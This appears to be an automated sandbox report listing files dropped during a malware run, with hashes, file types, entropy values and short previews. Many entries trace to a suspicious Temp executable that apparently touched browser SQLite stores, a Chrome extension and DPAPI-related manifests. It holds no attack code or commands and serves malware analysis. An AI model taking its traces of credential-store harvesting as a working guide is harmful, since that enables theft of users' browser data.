                                                                                                                                                                                                                                                                MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                                                                SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                                                                SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                                                                SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24008
                                                                                                                                                                                                                                                                Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4814
                                                                                                                                                                                                                                                                Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4533
                                                                                                                                                                                                                                                                Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3958094375125357
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:nQwlrNmQnc/vSpKll7DYMcCSG8JO8VFDYMcSzi:QcfITll4/jVG
                                                                                                                                                                                                                                                                MD5:CB5BF3CC261B4FE5AD758C20925373CD
                                                                                                                                                                                                                                                                SHA1:9EC0DE71E0263B7C0714043097DC2AE669C2F2BE
                                                                                                                                                                                                                                                                SHA-256:CEE51CA746542EEDE94535D76234D0D5F336EBB474AC70A577304C6F0651032E
                                                                                                                                                                                                                                                                SHA-512:852A02FE2981DAA552414D028D3F9689CF13B0082BC628F146171FC40BF4416C9E5623EA36693B42401346923CDDD703B2710A1C49C280E5A55334FB5AB72680
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2062
                                                                                                                                                                                                                                                                Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                                MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                                SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                                SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                                SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45985
                                                                                                                                                                                                                                                                Entropy (8bit):6.087842589165287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:xMkbJrT8IeQc5dXf2LmZ0KatZ1kndcQP8oYNxoZ20+YC1oAwWE7RTupzKscDX//n:xMk1rT8H1X6QYNGU0nIoAoRTuin
                                                                                                                                                                                                                                                                MD5:2610F08E59EF86EA1C7FDCB2C0A7EE00
                                                                                                                                                                                                                                                                SHA1:379594DB54E176B6C4B098C1BAC22B647EE581B5
                                                                                                                                                                                                                                                                SHA-256:6859A816C05AC617B73C90EB9BB1D5CB18A729493BCD65A50633B89A94707B45
                                                                                                                                                                                                                                                                SHA-512:B74E0DACAF6B86D0E5923DFF5B4DC1E78CC6B3FADF3B381B02E4F516F6CA54C0C233F38C51D68075EC8035D9EDE3B5311FDAB299E82A2F677DD8DC8849A5FD10
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"591353d8-ec7b-485c-920d-b24610ab4123"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44703
                                                                                                                                                                                                                                                                Entropy (8bit):6.095581217496915
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xS9LmZ0KatZ1kndcQP8oKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOcQKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:D0458165629A3AF38D0BFBAD3531B052
                                                                                                                                                                                                                                                                SHA1:C159294EB45F2C1893D0CD07333553C63414A96B
                                                                                                                                                                                                                                                                SHA-256:F770EB0AB0531B022227D73C9C8A7C1F8F2F28306DF021655AB892267A6B02D8
                                                                                                                                                                                                                                                                SHA-512:4E4267FE6400D9684182601BDD48210CDE917AB5A699938CFCCB00C39BB527F10DF9E248153F333C62A001313A1A475AEA71D59466D176AC513C4B24D3628819
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44621
                                                                                                                                                                                                                                                                Entropy (8bit):6.095774627812403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kN9LmZ0KabdzwVzE9A8KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynVTKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:4F31614D5BAD6107E1D4A0AC9A0FA590
                                                                                                                                                                                                                                                                SHA1:3A4398712C2A5AD7ECE1D1D289043DED565E71F3
                                                                                                                                                                                                                                                                SHA-256:14C283B1735AD278F1E5F3954E93F9126CAA99D2199368EE729A604289E78579
                                                                                                                                                                                                                                                                SHA-512:63FDEDF1552BAA87F070435B1B7F6B5151B2418E064B6853B13F5DF7B199EF70B3868B1C96F396AFEB9FC232DC1B04650A89471C180DF1718EED15C088BC05AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                Entropy (8bit):0.04759814626283603
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:UIuCubv0pqtmvnOAQJYCQJ/7qiRD80JVFg8Xx+VInhEHsBzhEhNGMv+RQ8TfWdas:o9bv0cto4QV6onhcxmvWda08T2RGOD
                                                                                                                                                                                                                                                                MD5:2962D80F8DC19918E495A04688B8B475
                                                                                                                                                                                                                                                                SHA1:CFA30FEE92CA3749977AFB51FCC62E643BF601D6
                                                                                                                                                                                                                                                                SHA-256:91811F5458D61844EBEE219E58476E324C10143F6E6A65D1B9E15E1413B362BE
                                                                                                                                                                                                                                                                SHA-512:F77CA78B8F4DC6F7723C596E39A4C0488372569ABB8CC42EF7105D1CB88C3A01D1DFC8F1D4532F83AF711CBA869690C3E20C353FBAFF23FD195084E1533DEF28
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                Entropy (8bit):0.4295604991223989
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4IzsLqsTfrV0WNw9grzvbdP82t2exdZFFPtPBdqNbZLgQkFg1HFd:psLjrugfvbdP8uFPtPBdqN9LgQkFaHn
                                                                                                                                                                                                                                                                MD5:1C17A4E50C1E8BF0117E7835B6FA7DA6
                                                                                                                                                                                                                                                                SHA1:07C07026BF5A7F33A33DA447C37A466DDABFCB6A
                                                                                                                                                                                                                                                                SHA-256:6B3A7DF392DB9D09FB892544A0B080CEE35F099E59D925884EF8D5D6E04485A0
                                                                                                                                                                                                                                                                SHA-512:5DEE014AEE1B71876EDE40163F036B53E9C0E6A3572DE4D18794D6286F3C48FB43ACFB55A170420DAEEFE47EA0AACBE604819A6204890DB080E07DFE391C534B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17358), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17364
                                                                                                                                                                                                                                                                Entropy (8bit):5.494852263126019
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTebGCQwXmf7NIl:s7OXuxZwnCX3TGbGxVi
                                                                                                                                                                                                                                                                MD5:22D4FC2E4981D9259D01F3A3440E0DAC
                                                                                                                                                                                                                                                                SHA1:C5394A24025BB966A0843988473DF43AFD6CEB65
                                                                                                                                                                                                                                                                SHA-256:3378B96A4776BA5A1D85A4E052579CE2093FD1B93D76B6D79F23AD8D9AD66219
                                                                                                                                                                                                                                                                SHA-512:4BF2CBAFF994542DEBA0710E60F49130D81C935908D2DBCEB7C335031EDE2A26E000278D63FE06C7C4693A75DA90B10145C181BC0688D7597F812288796C4768
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
